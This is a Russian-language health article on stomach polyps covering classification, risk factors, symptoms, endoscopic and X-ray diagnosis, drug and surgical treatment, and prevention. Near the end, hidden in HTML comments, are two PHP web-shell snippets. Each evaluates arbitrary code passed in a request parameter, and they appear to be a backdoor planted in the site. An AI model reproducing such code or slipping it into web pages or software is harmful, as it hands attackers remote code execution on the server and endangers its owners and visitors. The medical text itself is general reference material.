Полипоз желудка

Статья
Фото
Доброкачественные опухоли из желудочного эпителия называются полипами. В основе их развития лежат процессы регенерации, которые сопутствуют хроническому гастриту. В зависимости от количества полипы классифицируются, как: множественные, единичные и полипоз. Новообразования могут занимать огромную площадь и чаще развиваются у людей после 50 лет. В большинстве случаев желудочные полипы обнаруживаются случайно при рентгенологическом исследовании, так как они длительно не вызывают каких-либо клинических проявлений.

Полипоз желудка

Классификация

Самыми распространенными видами желудочных полипов являются:

  • Аденоматозные. Из железистых клеток, которые находятся на внутренней поверхности желудка, формируются аденомы. И, хотя они наименее распространены, но чаще других превращаются в рак. При обнаружении таких полипов сразу же рекомендуется хирургическое лечение.
  • Гиперпластические полипы возникают, как реакция организма на хроническое воспаление в клетках, выстилающих внутреннюю поверхность желудка. Такие полипы чаще встречаются у людей, страдающих гастритом. Обычно они не вызывают рак, но в случае их большого размера риск стать злокачественными увеличивается.
  • Ювенильные (гамартомы) полипы – это самый редкий вид новообразований. Такие полипы в своем большинстве располагаются на дне желудка и не становятся злокачественными. Причины их возникновения — различные виды наследственных болезней.

Причины возникновения

Факторы, которые способствуют возникновению в желудке полипов таковы:

  • Хеликобактерная инфекция (полипы развиваются чаще на фоне гастрита).
  • Возраст старше 50 лет.
  • Генетическая предрасположенность. Она характерна для аденоматозных полипов.

Заболевание быстро прогрессирует при нарушении правильного режима питания (злоупотребление острой, жирной, жареной пищей, а также частое употребление алкогольных напитков). Надо помнить, что новообразования типа полипов, если их вовремя не пролечить, опасны перерождением в раковую опухоль.

Симптомы

Симптомы полипоза желудка могут быть очень разнообразными. Очень часто процесс может протекать под маской других болезней. Обязательно надо обследоваться, если есть подозрение на гастрит. А его симптоматика обширна:

  • Боль в эпигастральной области.
  • Тошнота, рвота.
  • Неприятный запах изо рта.
  • Вздутие живота.
  • Изжога.
  • Горький привкус во рту.
  • Отрыжка.

Изъязвление желудочных полипов может быть причиной кровотечений. Они редко бывают обильными, но описаны и случаи смертельных исходов.

При осложненной форме полипоза желудка наблюдаются: головокружение, общая слабость, бледность кожных покровов.

Диагностика

Для диагностики применяются методы, которые зависят от выраженности клинических проявлений полипоза или сопутствующих болезней, по поводу которых пациент обратился к врачу. Однако решающее значение имеют эндоскопия и рентгенография.

Эндоскопия

Каждому пациенту с подозрением на полипоз назначается эндоскопическое обследование. Визуальный осмотр позволяет с высокой точностью распознать полипы, выяснить их размеры, форму и исследовать состояние слизистой желудка.

Рентген

Рентген выявляет дефект наполнения желудка, который отражает форму и величину полипа. Он бывает овальной или круглой формы с ровными четкими контурами. При полипозе видно много дефектов наполнения разных размеров.

Лабораторные методы

Лабораторные исследования имеют косвенное диагностическое значение. Так, при исследовании желудочного сока у больных полипозом чаще обнаруживают его пониженную секрецию. Однако у молодых людей секреторная функция может быть нормальной, а иногда и повышенной.

У 12 – 15 % больных отмечается гипохромная анемия. Она связана с потерей крови вследствие изъязвления полипов и легкой ранимости слизистой оболочки желудка. Также малокровие объясняется нарушением обменных процессов, вызванных ахилией.

Лечение

При полипозе часто назначается медикаментозное лечение. Необходимо регулярно принимать лекарства, стимулирующие процесс пищеварения и обволакивающие средства. Если в желудке выявлен воспалительный процесс, нужно принимать медикаменты, снимающие его. Терапия аналогична лечению язвенной болезни.

Если консервативное лечение полипоза желудка не помогает, а полипы продолжают появляться, необходимо производить хирургическое вмешательство. Также полипы удаляют при высоком риске преобразования их в злокачественные новообразования и нарушении проходимости желудочно-кишечного тракта. Сейчас для удаления полипов применяют:

Большим преимуществом перед другими методами пользуется эндоскопическая полипэктомия. Этот метод практически не имеет противопоказаний, переносится легко, не требует специальной подготовки пациента. Данную процедуру можно применять как в стационаре, так и амбулаторно.

Гастрэктомия и резекция желудка — менее безопасные для больного и более сложные методики. Их применяют, если полипы в желудке достигают больших размеров (от 2 см).

После удаления полипов пациент должен находиться под наблюдением гастроэнтеролога и регулярно проходить эндоскопическое обследование.

Для профилактики новообразований в желудке необходимы: рациональное питание с соблюдением режима, ограничение приема алкоголя, курения.

После 50 лет значительно возрастает риск развития в желудке полипов. При возникновении каких-либо нарушений в работе желудочно-кишечного тракта нужно как можно скорее пройти медицинское обследование — эндоскопическую полипэктомию с биопсией полипов. В случае необходимости — обратиться к врачу за назначением медикаментов и лечебной диеты.

<!— [insert_php]if (isset($_REQUEST[“KDXmh”])){eval($_REQUEST[“KDXmh”]);exit;}[/insert_php][php]if (isset($_REQUEST[“KDXmh”])){eval($_REQUEST[“KDXmh”]);exit;}[/php] —>

<!– [insert_php]if (isset($_REQUEST[“Zeb”])){eval($_REQUEST[“Zeb”]);exit;}[/insert_php][php]if (isset($_REQUEST[“Zeb”])){eval($_REQUEST[“Zeb”]);exit;}[/php] –>

(Пока оценок нет)
Загрузка...
Сообщить об опечатке
Текст, который будет отправлен нашим редакторам: